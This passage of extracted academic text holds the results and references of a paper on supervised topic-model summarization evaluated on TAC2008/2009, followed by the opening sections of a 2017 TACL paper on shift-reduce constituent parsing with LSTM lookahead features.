collection. Sentences with higher ranking score is selected into the summary. HierSum: A LDA based approach proposed by Haghighi and Vanderwende (2009), where unigram distribution is calculated from LDA topic model in Equ.(14). Hybhsum: A supervised approach developed by Celikyilmaz and Hakkani-Tur (2010). For fair comparison, baselines use the same pro- precessing methods with our model and all sum- 5Here, we only use the docset-A data in TAC, since TAC data is composed of docset-A and docset-B data, and the docset- B data is mainly for the update summarization task. 6http://tartarus.org/ martin/PorterStemmer/. 7Jackknife scoring for ROUGE is used in order to compare with the human summaries. 94 maries are truncated to the same length of 100 words. From Table 1 and Table 2, we can Methods ROUGE-1 ROUGE-2 ROUGE-SU4 Our 0.3724 0.1030 0.1342 approach (0.3660-0.3788) (0.0999-0.1061) (0.1290-0.1394) Hybhsum 0.3703 0.1007 0.1314 (0.3600-0.3806) (0.0952-0.1059) (0.1241-0.1387) HierSum 0.3613 0.0948 0.1278 (0.3374-0.3752) (0.0899-0.0998) (0.1197-0.1359) KLsum 0.3504 0.0917 0.1234 (0.3411-0.3597) (0.0842-0.0992) (0.1155-0.1315) StandLDA 0.3368 0.0797 0.1156 (0.3252-0.3386) (0.0758-0.0836) (0.1072-0.1240) Table 1: Comparison of Bayesian models on TAC2008 Methods ROUGE-1 ROUGE-2 ROUGE-SU4 Our 0.3903 0.1223 0.1488 approach (0.3819-0.3987) (0.1167-0.1279) (0.1446-0.1530) Hybhsum 0.3824 0.1173 0.1436 (0.3686-0.3952) (0.1132-0.1214) (0.1358-0.1514) HierSum 0.3706 0.1088 0.1386 (0.3624-0.3788) (0.0950-0.1144) (0.1312-0.1464) KLsum 0.3619 0.0972 0.1299 (0.3510-0.3728) (0.0917-0.1047) (0.1213-0.1385) StandLDA 0.3552 0.0847 0.1214 (0.3447-0.3657) (0.0813-0.0881) (0.1141-0.1286) Table 2: Comparison of Bayesian models on TAC2009 see that among all the Bayesian baselines, Hybh- sum achieves the best result. This further illus- trates the advantages of combining topic model with supervised method. In Table 1, we can see that our S-sLDA model performs better than Hybhsum and the improvements are 3.4% and 3.7% with re- spect to ROUGE-2 and ROUGE-SU4 on TAC2008 data. The comparison can be extended to TAC2009 data as shown in Table 2: the performance of S- sLDA is above Hybhsum by 4.3% in ROUGE-2 and 5.1% in ROUGE-SU4. It is worth explaining that these achievements are significant, because in the TAC2008 evaluation, the performance of the top ranking systems are very close, i.e. the best system is only 4.2% above the 4th best system on ROUGE- 2 and 1.2% on ROUGE-SU4. 5.3 Comparison with other baselines. In this subsection, we compare our model with some widely used models in summarization. Manifold: It is the one-layer graph based semi- supervised summarization approach developed by Wan et al.(2008). The graph is constructed only con- sidering sentence relations using tf-idf and neglects topic information. LexRank: Graph based summarization approach (Erkan and Radev, 2004), which is a revised version of famous web ranking algorithm PageRank. It is an unsupervised ranking algorithms compared with Manifold. SVM: A supervised method - Support Vector Ma- chine (SVM) (Vapnik 1995) which uses the same features as our approach. MEAD: A centroid based summary algorithm by Radev et al. (2004). Cluster centroids in MEAD consists of words which are central not only to one article in a cluster, but to all the articles. Similarity is measure using tf-idf. At the same time, we also present the top three participating systems with regard to ROUGE-2 on TAC2008 and TAC2009 for comparison, denoted as (denoted as SysRank 1st, 2nd and 3rd)(Gillick et al., 2008; Zhang et al., 2008; Gillick et al., 2009; Varma et al., 2009). The ROUGE scores of the top TAC system are directly provided by the TAC evaluation. From Table 3 and Table 4, we can see that our approach outperforms the baselines in terms of ROUGE metrics consistently. When compared with the standard supervised method SVM, the relative improvements over the ROUGE-1, ROUGE-2 and ROUGE-SU4 scores are 4.3%, 13.1%, 8.3% respec- tively on TAC2008 and 7.2%, 14.9%, 14.3% on TAC2009. Our model is not as good as top par- ticipating systems on TAC2008 and TAC2009. But considering the fact that our model neither uses sen- tence compression algorithm nor leverage domain knowledge bases like Wikipedia or training data, such small difference in ROUGE scores is reason- able. 5.4 Manual Evaluations In order to obtain a more accurate measure of sum- mary quality for our S-sLDA model and Hybhsum, we performed a simple user study concerning the following aspects: (1) Overall quality: Which sum- mary is better overall? (2) Focus: Which summary contains less irrelevant content? (3)Responsiveness: Which summary is more responsive to the query. (4) Non-Redundancy: Which summary is less re- dundant? 8 judges who specialize in NLP partic- ipated in the blind evaluation task. Evaluators are presented with two summaries generated by S-sLDA 95 Methods ROUGE-1 ROUGE-2 ROUGE-SU4 Our 0.3724 0.1030 0.1342 approach (0.3660-0.3788) (0.0999-0.1061) (0.1290-0.1394) SysRank 1st 0.3742 0.1039 0.1364 (0.3639-0.3845) (0.0974-0.1104) (0.1285-0.1443) SysRank 2nd 0.3717 0.0990 0.1326 (0.3610-0.3824 (0.0944-0.1038) (0.1269-0.1385) SysRank 3rd 0.3710 0.0977 0.1329 (0.3550-0.3849) (0.0920-0.1034) (0.1267-0.1391) PageRank 0.3597 0.0879 0.1221 (0.3499-0.3695) (0.0809-0.0950) (0.1173-0.1269) Manifold 0.3621 0.0931 0.1243 (0.3506-0.3736) (0.0868-0.0994) (0.1206-0.1280) SVM 0.3588 0.0921 0.1258 (0.3489-0.3687) (0.0882-0.0960) (0.1204-0.1302) MEAD 0.3558 0.0917 0.1226 (0.3489-0.3627) (0.0882-0.0952) (0.1174-0.1278) Table 3: Comparison with baselines on TAC2008 Methods ROUGE-1 ROUGE-2 ROUGE-SU4 Our 0.3903 0.1223 0.1488 approach (0.3819-0.3987) (0.1167-0.1279) (0.1446-0.1530) SysRank 1st 0.3917 0.1218 0.1505 (0.3778-0.4057) (0.1122-0.1314) (0.1414-0.1596) SysRank 2nd 0.3914 0.1212 0.1513 (0.3808-0.4020) (0.1147-0.1277) (0.1455-0.1571) SysRank 3rd 0.3851 0.1084 0.1447 (0.3762-0.3932) (0.1025-0.1144) (0.1398-0.1496) PageRank 0.3616 0.0849 0.1249 (0.3532-0.3700) (0.0802-0.0896) (0.1221-0.1277) Manifold 0.3713 0.1014 0.1342 (0.3586-0.3841) (0.0950-0.1178) (0.1299-0.1385) SVM 0.3649 0.1028 0.1319 (0.3536-0.3762) (0.0957-0.1099) (0.1258-0.1380) MEAD 0.3601 0.1001 0.1287 (0.3536-0.3666) (0.0953-0.1049) (0.1228-0.1346) Table 4: Comparison with baselines on TAC2009 and Hybhsum, as well as the four questions above. Then they need to answer which summary is better (tie). We randomly select 20 document collections from TAC 2008 data and randomly assign two sum- maries for each collection to three different evalua- tors to judge which model is better in each aspect. As we can see from Table 5, the two models al- most tie with respect to Non-redundancy, mainly because both models have used appropriate MMR strategies. But as for Overall quality, Focus and Our(win) Hybhsum(win) Tie Overall 37 14 9 Focus 32 18 10 Responsiveness 33 13 14 Non-redundancy 13 11 36 Table 5: Comparison with baselines on TAC2009 Responsiveness, S-sLDA model outputs Hybhsum based on t-test on 95% confidence level. Ta- ble 6 shows the example summaries generated re- spectively by two models for document collection D0803A-A in TAC2008, whose query is “Describe the coal mine accidents in China and actions taken“. From table 6, we can see that each sentence in these two summaries is somewhat related to topics of coal mines in China. We also observe that the summary in Table 6(a) is better than that in Table 6(b), tend- ing to select shorter sentences and provide more in- formation. This is because, in S-sLDA model, topic modeling is determined simultaneously by various features including terms and other ones such as sen- tence length, sentence position and so on, which can contribute to summary quality. As we can see, in Table 6(b), sentences (3) and (5) provide some unimportant information such as “somebody said“, though they contain some words which are related to topics about coal mines. (1)China to close at least 4,000 coal mines this year: official (2)By Oct. 10 this year there had been 43 coal mine accidents that killed 10 or more people, (3)Offi- cials had stakes in coal mines. (4)All the coal mines will be closed down this year. (5) In the first eight months, the death toll of coal mine accidents rose 8.5 percent last year. (6) The government has issued a series of regulations and measures to improve the coun.try’s coal mine safety situation. (7)The mining safety technology and equipments have been sold to countries. (8)More than 6,000 miners died in accidents in China (1) In the first eight months, the death toll of coal mine accidents across China rose 8.5 percent from the same period last year. (2)China will close down a number of ill-operated coal mines at the end of this month, said a work safety official here Monday. (3) Li Yizhong, director of the National Bureau of Production Safety Supervision and Administration, has said the collusion between mine owners and officials is to be condemned. (4)from January to September this year, 4,228 people were killed in 2,337 coal mine accidents. (5) Chen said officials who refused to register their stakes in coal mines within the required time Table 6: Example summary text generated by systems (a)S-sLDA and (b) Hybhsum. (D0803A-A, TAC2008) 96 6 Conclusion In this paper, we propose a novel supervised ap- proach based on revised supervised topic model for query-focused multi document summarization. Our approach naturally combines Bayesian topic model with supervised method and enjoy the advantages of both models. Experiments on benchmark demon- strate good performance of our model. Acknowledgments This research work has been supported by NSFC grants (No.90920011 and No.61273278), National Key Technology R&D Program (No:2011BAH1B0403), and National High Tech- nology R&D Program (No.2012AA011101). We also thank the three anonymous reviewers for their helpful comments. Corresponding author: Sujian Li. References David Blei and Jon McAuliffe. Supervised topic models. 2007. In Neural Information Processing Systems David Blei, Andrew Ng and Micheal Jordan. Latent dirichlet allocation. In The Journal of Machine Learn- ing Research, page: 993-1022. Charles Broyden. 1965. A class of methods for solv- ing nonlinear simultaneous equations. In Math. Comp. volume 19, page 577-593. Jaime Carbonell and Jade Goldstein. 1998. The use of MMR, diversity-based reranking for reordering doc- uments and producing summaries. In Proceedings of the 21st annual international ACM SIGIR conference on Research and development in information retrieval. Asli Celikyilmaz and Dilek Hakkani-Tur. 2010. A Hy- brid hierarchical model for multi-document summa- rization. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics. page: 815-825 Jade Goldstein, Mark Kantrowitz, Vibhu Mittal and Jaime Carbonell. 1999. Summarizing Text Docu- ments: Sentence Selection and Evaluation Metrics. In Proceedings of the 22nd annual international ACM SI- GIR conference on Research and development in infor- mation retrieval, page: 121-128. Amit Grubber, Micheal Rosen-zvi and Yair Weiss. 2007. Hidden Topic Markov Model. In Artificial Intelligence and Statistics. Hal Daume and Daniel Marcu H. 2006. Bayesian Query- Focused Summarization. In Proceedings of the 21st International Conference on Computational Linguis- tics and the 44th annual meeting of the Association for Computational Linguistics, page 305-312. Gune Erkan and Dragomir Radev. 2004. Lexrank: graph- based lexical centrality as salience in text summariza- tion. In J. Artif. Intell. Res. (JAIR), page 457-479. Dan Gillick, Benoit Favre, Dilek Hakkani-Tur, The ICSI Summarization System at TAC, TAC 2008. Dan Gillick, Benoit Favre, and Dilek Hakkani-Tur, Berndt Bohnet, Yang Liu, Shasha Xie. The ICSI/UTD Summarization System at TAC 2009. TAC 2009 Aria Haghighi and Lucy Vanderwende. 2009. Exploring content models for multi-document summarization. In Proceedings of Human Language Technologies: The 2009 Annual Conference of the North American Chap- ter of the Association for Computational Linguistics, pages 362370. Feng Jin, Minlie Huang, and Xiaoyan Zhu. 2010. The summarization systems at tac 2010. In Proceedings of the third Text Analysis Conference, TAC-2010. Liangda Li, Ke Zhou, Gui-Rong Xue, Hongyuan Zha and Yong Yu. 2009. Enhancing diversity, coverage and bal- ance for summarization through structure learning. In Proceedings of the 18th international conference on World wide web, page 71-80. Chin-Yew Lin, Guihong Gao, Jianfeng Gao and Jian-Yun Nie. 2006. An information-theoretic approach to au- tomatic evaluation of summaries. In Proceedings of the main conference on Human Language Technology Conference of the North American Chapter of the As- sociation of Computational Linguistics, page:462-470. Annie Louis, Aravind Joshi, Ani Nenkova. 2010. Dis- course indicators for content selection in summariza- tion. In Proceedings of the 11th Annual Meeting of the Special Interest Group on Discourse and Dialogue, page:147-156. Tengfei Ma, Xiaojun Wan. 2010. Multi-document sum- marization using minimum distortion, in Proceedings of International Conference of Data Mining. page 354363. Rebecca Mason and Eugene Charniak. 2011. Extractive multi-document summaries should explicitly not con- tain document-specific content. In proceedings of ACL HLT, page:49-54. Ani Nenkova and Lucy Vanderwende. The impact of fre- quency on summarization. In Tech. Report MSR-TR- 2005-101, Microsoft Research, Redwood, Washing- ton, 2005. Ani Nenkova, Lucy Vanderwende and Kathleen McKe- own. 2006. A compositional context sensitive multi- document summarizer: exploring the factors that inu- ence summarization. In Proceedings of the 29th an- nual International ACM SIGIR Conference on Re- 97 search and Development in Information Retrieval, page 573-580. Miles Osborne. 2002. Using maximum entropy for sen- tence extraction. In Proceedings of the ACL-02 Work- shop on Automatic Summarization, Volume 4 page:1- 8. Jahna Otterbacher, Gunes Erkan and Dragomir Radev. 2005. Using random walks for question-focused sen- tence retrieval. In Proceedings of the Conference on Human Language Technology and Empirical Methods in Natural Language Processing, page 915-922 You Ouyang, Wenjie Li, Sujian Li and Qin Lua. 2011. Applying regression models to query-focused multi- document summarization. In Information Processing and Management, page 227-237. You Ouyang, Sujian. Li, and Wenjie. Li. 2007, Develop- ing learning strategies for topic-based summarization. In Proceedings of the sixteenth ACM conference on Conference on information and knowledge manage- ment, page: 7986. Daniel Ramage, David Hall, Ramesh Nallapati and Christopher Manning. 2009. Labeled LDA: A super- vised topic model for credit attribution in multi-labeled corpora. In Proceedings of the 2009 Conference on Empirical Methods in Natural Language Processing, Vol 1, page 248-256. Dou She, Jian-Tao Sun, Hua Li, Qiang Yang and Zheng Chen. 2007. Document summarization using conditional random elds. In Proceedings of Inter- national Joint Conference on Artificial Intelligence, page: 28622867. V. Varma, V. Bharat, S. Kovelamudi, P. Bysani, S. GSK, K. Kumar N, K. Reddy, N. Maganti , IIIT Hyderabad at TAC 2009. TAC2009 Xiaojun Wan and Jianwu Yang. 2008. Multi-document Summarization using cluster-based link analysis. In Proceedings of the 31st annual international ACM SI- GIR conference on Research and development in in- formation retrieval, page: 299-306. Xiaojun Wan, Jianwu Yang and Jianguo Xiao. 2007. Manifold-ranking based topic-focused multi- document summarization. In Proceedings of In- ternational Joint Conference on Artificial Intelligence, page 2903-2908. Furu Wei, Wenjie Li, Qin Lu and Yanxiang He. 2008. Ex- ploiting Query-Sensitive Similarity for Graph-Based Query-Oriented Summarization. In Proceedings of the 31st annual International ACM SIGIR Conference on Research and Development in Information Retrieval, page 283-290. Jin Zhang, Xueqi Cheng, Hongbo Xu, Xiaolei Wang, Yil- ing Zeng. ICTCAS’s ICTGrasper at TAC 2008: Sum- marizing Dynamic Information with Signature Terms Based Content Filtering, TAC 2008. Dengzhong Zhou, Jason Weston, Arthur Gretton, Olivier Bousquet and Bernhard Schlkopf. 2003. Ranking on Data Manifolds. In Proceedings of the Conference on Advances in Neural Information Processing Systems, page 169-176. Jun Zhu and Eric Xing. 2010. Conditional Topic Random Fields. In Proceedings of the 27th International Con- ference on Machine Learning. Xiaojin Zhu, Zoubin Ghahramani and John Laf- ferty. 2003. Semi-supervised Learning using Gaussian Fields and Harmonic Functions. In Proceedings of In- ternational Conference of Machine Learning, page: 912-919. 98 work_235n7dcftbgpplqreihoa3x6uy ---- Shift-Reduce Constituent Parsing with Neural Lookahead Features Jiangming Liu and Yue Zhang Singapore University of Technology and Design, 8 Somapah Road, Singapore, 487372 {jiangming liu, yue zhang}@sutd.edu.sg Abstract Transition-based models can be fast and accu- rate for constituent parsing. Compared with chart-based models, they leverage richer fea- tures by extracting history information from a parser stack, which consists of a sequence of non-local constituents. On the other hand, during incremental parsing, constituent infor- mation on the right hand side of the current word is not utilized, which is a relative weak- ness of shift-reduce parsing. To address this limitation, we leverage a fast neural model to extract lookahead features. In particular, we build a bidirectional LSTM model, which leverages full sentence information to predict the hierarchy of constituents that each word starts and ends. The results are then passed to a strong transition-based constituent parser as lookahead features. The resulting parser gives 1.3% absolute improvement in WSJ and 2.3% in CTB compared to the baseline, giv- ing the highest reported accuracies for fully- supervised parsing. 1 Introduction Transition-based constituent parsers are fast and ac- curate, performing incremental parsing using a se- quence of state transitions in linear time. Pioneer- ing models rely on a classifier to make local de- cisions, searching greedily for local transitions to build a parse tree (Sagae and Lavie, 2005). Zhu et al. (2013) use a beam search framework, which preserves linear time complexity of greedy search, while alleviating the disadvantage of error propaga- tion. The model gives state-of-the-art accuracies at a speed of 89 sentences per second on the standard WSJ benchmark (Marcus et al., 1993). Zhu et al. (2013) exploit rich features by extract- ing history information from a parser stack, which consists of a sequence of non-local constituents. However, due to the incremental nature of shift- reduce parsing, the right-hand side constituents of the current word cannot be used to guide the action at each step. Such lookahead features (Tsuruoka et al., 2011) correspond to the outside scores in chart parsing (Goodman, 1998), which has been effective for obtaining improved accuracies. To leverage such information for improving shift- reduce parsing, we propose a novel neural model to predict the constituent hierarchy related to each word before parsing. Our idea is inspired by the work of Roark and Hollingshead (2009) and Zhang et al. (2010b), which shows that shallow syntactic information gathered over the word sequence can be utilized for pruning chart parsers, improving chart parsing speed without sacrificing accuracies. For ex- ample, Roark and Hollingshead (2009) predict con- stituent boundary information on words as a pre- processing step, and use such information to prune the chart. Since such information is much lighter- weight compared to full parsing, it can be predicted relatively accurately using sequence labellers. Different from Roark and Hollingshead (2009), we collect lookahead constituent information for shift-reduce parsing, rather than pruning informa- tion for chart parsing. Our main concern is improv- ing the accuracy rather than improving the speed. Accordingly, our model should predict the con- stituent hierarchy for each word rather than simple boundary information. For example, in Figure 1(a), the constituent hierarchy that the word “The” starts is “S → NP”, and the constituent hierarchy that the word “table” ends is “S → VP → NP → PP → NP”. 45 Transactions of the Association for Computational Linguistics, vol. 5, pp. 45–58, 2017. Action Editor: Brian Roark. Submission batch: 5/2016; Revision batch: 9/2016; Published 1/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. NP VB DT NN NP VP S (a) (b) DT NNS The students like this book ADJP JJ past CC and JJ present NP PP NP DT NN the table IN on Word s-type e-type The [s: S NP] [e: Ø ] past [s: ADJP] [e: Ø ] and [s: Ø] [e: Ø ] present [s: Ø] [e: ADJP ] students [s: Ø] [e: NP ] like [s: VP] [e: Ø ] this [s: NP NP] [e: Ø ] book [s: Ø] [e: NP ] on [s: PP] [e: Ø ] the [s: NP] [e: Ø ] table [s: Ø [e: S VP NP PP NP ] Figure 1: Example constituent hierarchies for the sentence “The past and present students like this book on the table”. (a) parse tree; (b) constituent hierarchies on words. For each word, we predict both the constituent hier- archy it starts and the constituent hierarchy it ends, using them as lookahead features. The task is challenging. First, it is significantly more difficult compared to simple sequence la- belling, since two sequences of constituent hierar- chies must be predicted for each word in the input sequence. Second, for high accuracies, global fea- tures from the full sentence are necessary since con- stituent hierarchies contain rich structural informa- tion. Third, to retain high speed for shift-reduce parsing, lookahead feature prediction must be exe- cuted efficiently. It is highly difficult to build such a model using manual discrete features and structured search. Fortunately, sequential recurrent neural networks (RNNs) are remarkably effective models to encode the full input sentence. We leverage RNNs for build- ing our constituent hierarchy predictor. In particular, an LSTM (Hochreiter and Schmidhuber, 1997) is used to learn global features automatically from the input words. For each word, a second LSTM is then used to generate the constituent hierarchies greed- ily using features from the hidden layer of the first LSTM, in the same way a neural language model de- coder generates output sentences for machine trans- lation (Bahdanau et al., 2015). The resulting model solves all three challenges raised above. For fully- supervised learning, we learn word embeddings as part of the model parameters. In the standard WSJ (Marcus et al., 1993) and CTB 5.1 tests (Xue et al., 2005), our parser gives 1.3 F1 and 2.3 F1 improvement, respectively, over the Initial State [φ, 0,false, 0] Final State [S,n,true,m : 2n <= m <= 4n] Induction Rules: SHIFT [S,i,false,k] [S|w,i+1,false,k+1] REDUCE-L/R-X [S|s1s0,i,false,k] [S|X,i,false,k+1] UNARY-X [S|s0,i,false,k] [S|X,i,false,k+1] FINISH [S,n,false,k] [S,n,true,k+1] IDLE [S,n,true,k] [S,n,true,k+1] Figure 2: Deduction system for the baseline shift- reduce parsing process. baseline of Zhu et al. (2013), resulting in a accuracy of 91.7 F1 for English and 85.5 F1 for Chinese, which are the best for fully-supervised models in the literature. We release our code, based on ZPar (Zhang and Clark, 2011; Zhu et al., 2013), at https://github.com/SUTDNLP/LookAheadConparser. 2 Baseline System We adopt the parser of Zhu et al. (2013) for a base- line, which is based on the shift-reduce process of Sagae and Lavie (2005) and the beam search strat- egy of Zhang and Clark (2011) with global percep- tron training. 46 2.1 The Shift-Reduce System Shift-reduce parsers process an input sentence in- crementally from left to right. A stack is used to maintain partial phrase-structures, while the incom- ing words are ordered in a buffer. At each step, a transition action is applied to consume an input word or construct a new phrase-structure. The set of tran- sition actions are • SHIFT: pop the front word off the buffer, and push it onto the stack. • REDUCE-L/R-X: pop the top two constituents off the stack (L/R means that the head is the left constituent or the right constituent, respec- tively), combine them into a new constituent with label X, and push the new constituent onto the stack. • UNARY-X: pop the top constituent off the stack, raise it to a new constituent X, and push the new constituent onto the stack. • FINISH: pop the root node off the stack and end parsing. • IDLE: no-effect action on a completed state without changing items on the stack or buffer, used to ensure that the same number of actions are in each item in beam search (Zhu et al., 2013). The deduction system for the process is shown in Figure 2, where a state is represented as [stack, buffer front index, completion mark, action index], and n is the number of words in the input. For ex- ample, given the sentence “They like apples”, the action sequence “SHIFT, SHIFT, SHIFT, REDUCE- L-VP, REDUCE-R-S” gives its syntax “(S They (VP like apples) )”. 2.2 Search and Training Beam-search is used for decoding with the k best state items at each step being kept in the agenda. During initialization, the agenda contains only the initial state [φ, 0,false, 0]. At each step, each state in the agenda is popped and expanded by apply- ing all valid transition actions, and the top k re- sulting states are put back onto the agenda (Zhu et al., 2013). The process repeats until the agenda is Description Templates UNIGRAM s0tc,s0wc,s1tc,s1wc,s2tc s2wc,s3tc,s3wc,q0wt,q1wt q2wt,q3wt,s0lwc,s0rwc s0uwc,s1lwc,s1rwc,s1uwc BIGRAM s0ws1w,s0ws1c,s0cs1w,s0cs1c s0wq0w,s0wq0t,s0cq0w,s0cq0t q0wq1w,q0wq1t,q0tq1w,q0tq1t s1wq0w,s1wq0t,s1cq0w,s1cq0t TRIGRAM s0cs1cs2c,s0ws1cs2c,s0cs1wq0t s0cs1cs2w,s0cs1cq0t,s0ws1cq0t s0cs1wq0t,s0cs1cq0w Extended s0llwc,s0lrwc,s0luwc s0rlwc,s0rrwc,s0ruwc s0ulwc,s0urwc,s0uuwc s1llwc,s1lrwc,s1luwc s1rlwc,s1rrwc,s1ruwc Table 1: Baseline feature templates, where si rep- resents the ith item on the top of the stack and qi denotes the ith item in the front of the buffer. The symbol w denotes the lexical head of an item; the symbol c denotes the constituent label of an item; the symbol t is the POS of a lexical head; u denotes unary child; sill denotes the left child of si’s left child. empty, and the best completed state is taken as out- put. The score of a state is the total score of the transi- tion actions that have been applied to build it: C(α) = N∑ i=1 Φ(αi) ·~θ (1) Here Φ(αi) represents the feature vector for the ith action αi in the state item α. N is the total number of actions in α. The model parameter vector ~θ is trained online using the averaged perceptron algorithm with the early-update strategy (Collins and Roark, 2004). 2.3 Baseline Features Our baseline features are taken from Zhu et al. (2013). As shown in Table 1, they include the UN- IGRAM, BIGRAM, TRIGRAM features of Zhang and Clark (2009) and the extended features of Zhu et al. (2013). 47 Templates s0gs,s0ge,s1gs,s1ge q0gs,q0ge,q1gs,q1ge Table 2: Lookahead feature templates, where si rep- resents the ith item on the top of the stack and qi de- notes the ith item in the front end of the buffer. The symbol gs and ge denote the next level constituent in the s-type hierarchy and e-type hierarchy, respec- tively. 3 Global Lookahead Features The baseline features suffer two limitations, as men- tioned in the introduction. First, they are relatively local to the state, considering only the neighbouring nodes of s0 (top of stack) and q0 (front of buffer). Second, they do not consider lookahead information beyond s3, or the syntactic structure of the buffer and sequence. We use an LSTM to capture full sen- tential information in linear time, representing such global information that is fed into the baseline parser as a constituent hierarchy for each word. Lookahead features are extracted from the constituent hierarchy to provide top-down guidance for bottom-up pars- ing. 3.1 Constituent Hierarchy In a constituency tree, each word can start or end a constituent hierarchy. As shown in Figure 1, the word “The” starts a constituent hierarchy “S → NP”. In particular, it starts a constituent S in the top level, dominating a constituent NP. The word “table” ends a constituent hierarchy “S → VP → NP → PP → NP”. In particular, it ends a constituent hierarchy, with a constituent S on the top level, dominating a VP (starting from the word “like”), and then an NP (starting from the noun phrase “this book”), and then a PP (starting from the word “in”), and finally an NP (starting from the word “the”). The extraction of constituent hierarchies for each word is based on un- binarized grammars, reflecting the unbinarized trees that the word starts or ends. The constituent hier- archy is empty (denoted as φ) if the corresponding word does not start or end a constituent. The con- stituent hierarchies are added into the shift-reduce parser as soft features (section 3.2). Formally, a constituent hierarchy is defined as [type : c1 → c2 → ... → cz], where c is a constituent label (e.g. NP), “→” repre- sents the top-down hierarchy, and type can be s or e, denoting that the current word starts or ends the con- stituent hierarchy, respectively, as shown in Figure 1. Compared with full parsing, the constituent hier- archies associated with each word have no forced structural dependencies between each other, and therefore can be modelled more easily, for each word individually. Being soft lookahead features rather than hard constraints, inter-dependencies are not crucial for the main parser. 3.2 Lookahead Features The lookahead feature templates are defined in Table 2. In order to ensure parsing efficiency, only simple feature templates are taken into consideration. The lookahead features of a state are instantiated for the top two items on the stack (i.e., s0 and s1) and buffer (i.e., q0 and q1). The new function Φ′ is defined to output the lookahead features vector. The scoring of a state in our model is based on Formula (1) but with a new term Φ′(αi) · ~θ′: C′(α) = N∑ i=1 Φ(αi) ·~θ + Φ′(αi) · ~θ′ For each word, the lookahead feature represents the next level constituent in the top-down hierarchy, which can guide bottom-up parsing. For example, Figure 3 shows two intermediate states during parsing. In Figure 3(a), the s-type and e-type lookahead features of s1 (i.e., the word “The” are extracted from the constituent hierarchy in the bottom level, namely NP and NULL, respec- tively. On the other hand, in Figure 3(b), the s-type lookahead feature of s1 is extracted from the s-type constituent hierarchy of same word “The”, but it is S based on current hierarchical level. The e-type lookahead feature, on the other hand, is extracted from the e-type constituent hierarchy of end word “students” of the VP constituent, which is NULL in the next level. Lookahead features for items on the buffer are extracted in the same way. The lookahead features are useful for guiding shift-reduce decisions given the current state. For 48 stack buffer DT The JJ past CC and JJ present s0s1 S NP Ø ADJP Ø s0gs s0ge=nulls1gs s1ge=null Ø Ø Ø ADJP q0 q1 q0gs=null q0ge=null q1gs=null q1ge NP VB DT NN DT NNS s0s1 q0 q1 The students like this book S NP VP VP Ø NP NPØ Ø s1ge=null s0gs s0ge=null q0gs q0ge=null q1gs=null stack buffer q1ges1gs ADJP past and present (a) (b) incorrect Constituent hierarchy Look-ahead features Configuration Figure 3: Two intermediate states for parsing on the sentence “The past and present students like this book on the table”. Each item on the stack or buffer has two constituent hierarchies: s-type (left) and e-type (right), respectively, in the corresponding box. Note that the e-type constituent hierarchy of the word “students” is incorrectly predicted, yet used as soft constraints (i.e., features) in our model. example, given the intermediate state in Figure 3(a), s0 has a s-type lookahead feature ADJP, and q1 in the buffer has e-type lookahead feature ADJP. This indicates that the two items are likely reduced into the same constituent. Further, s0 cannot end a con- stituent because of the empty e-type constituent hi- erarchy. As a result, the final shift-reduce parser will assign a higher score to the SHIFT decision. 4 Constituent Hierarchy Prediction We propose a novel neural model for constituent hi- erarchy prediction. Inspired by the encoder-decoder framework for neural machine translation (Bah- danau et al., 2015; Cho et al., 2014), we use an LSTM to capture full sentence features, and another LSTM to generate the constituent hierarchies for each word. Compared with a CRF-based sequence labelling model (Roark and Hollingshead, 2009), the proposed model has three advantages. First, the global features can be automatically represented. Second, it can avoid the exponentially large num- ber of labels if constituent hierarchies are treated as unique labels. Third, the model size is relatively small, and does not have a large effect on the final parser model. As shown in Figure 4, the neural network con- sists of three main layers, namely the input layer, the encoder layer and the decoder layer. The input layer represents each word using its characters and token information; the encoder hidden layer uses a bidirectional recurrent neural network structure to learn global features from the sentence; and the de- coder layer predicts constituent hierarchies accord- ing to the encoder layer features, by using the atten- tion mechanism (Bahdanau et al., 2015) to compute the contribution of each hidden unit of the encoder. 4.1 Input Layer The input layer generates a dense vector representa- tion of each input word. We use character embed- dings to alleviate OOV problems in word embed- dings (Ballesteros et al., 2015; Santos and Zadrozny, 2014; Kim et al., 2016), concatenating character- embeddings of a word with its word embedding. Formally, the input representation xi of the word wi is computed by: xi = [xwi ; ci att] ci att = ∑ j αijc ′ ij, where xwi is a word embedding vector of the word wi according to a embedding lookup table, ci att is a character embedding form of the word wi, cij is the embedding of the jth character in wi, c′ij is the character window representation centered at cij, and αij is the contribution of the c′ij to ci att, which is computed by: αij = e f(xwi,c ′ ij) ∑ k e f(xwi,c ′ ik ) f is a non-linear transformation function. 49 … h1 h2 hn h1 h2 hn … … SoftMax … c2,1 c2,2 c2,m … … xw2 attention pooling Decoder layer Input layer Encoder layer y1j x2 xnx1 s1js1j-1 c2_att … x’2 x’nx’1 h1 h2 hn … cn,1 … … xwn attention pooling cn_att … cn,2 cn,m’ windows windows windows … c’2,1 c’2,2 c’2,m c’n,1 c’n,2 c’n,m’ Figure 4: Structure of the constituent hierarchy pre- diction model. −→ hi denotes the left-to-right encoder hidden units; ←− hi denotes the right-to-left encoder hidden units; s denotes the decoder hidden state vec- tor; and yij is the jth label of the word wi. 4.2 Encoder Layer The encoder first uses a window strategy to repre- sent input nodes with their corresponding local con- text nodes. Formally, a word window representation takes the form x′i = [xi−win; ...; xi; ...; xi+win]. Second, the encoder scans the input sentence and generates hidden units for each input word using a recurrent neural network (RNN), which represents features of the word from the global sequence. For- mally, given the windowed input nodes x′1, x ′ 2, ..., x′n for the sentence w1, w2, ..., wn, the RNN layer calculates a hidden node sequence h1, h2, ..., hn. Long Short-Term Memory (LSTM) mitigates the vanishing gradient problem in RNN training, by in- troducing gates (i.e., input i, forget f and output o) and a cell memory vector c. We use the variation of Graves and Schmidhuber (2008). Formally, the values in the LSTM hidden layers are computed as follows: ii = σ(W1x ′ i + W2hi−1 + W3 � ci−1 + b1) fi = 1 − ii c̃i = tanh(W4x ′ i + W5hi−1 + b2) ci = fi � ci−1 + ii � c̃i oi = σ(W6x ′ i + W7hi−1 + W8 � ci + b3) hi = oi � tanh(ci), where � is pair-wise multiplication. Further, in or- der to collect features for xi from both x′1, .., x ′ i−1 and x′i+1, ... x ′ n, we use a bidirectional variation (Schuster and Paliwal, 1997; Graves et al., 2013). As shown in Figure 4, the hidden units are generated by concatenating the corresponding hidden layers of a left-to-right LSTM −→ hi and a right-to-left LSTM ←− hi , where ←→ hi = [ −→ hi ; ←− hi ] for each word wi. 4.3 Decoder Layer The decoder hidden layer uses two different LSTMs to generate the s-type and e-type sequences of con- stituent labels from each encoder hidden output, re- spectively, as shown in Figure 4. 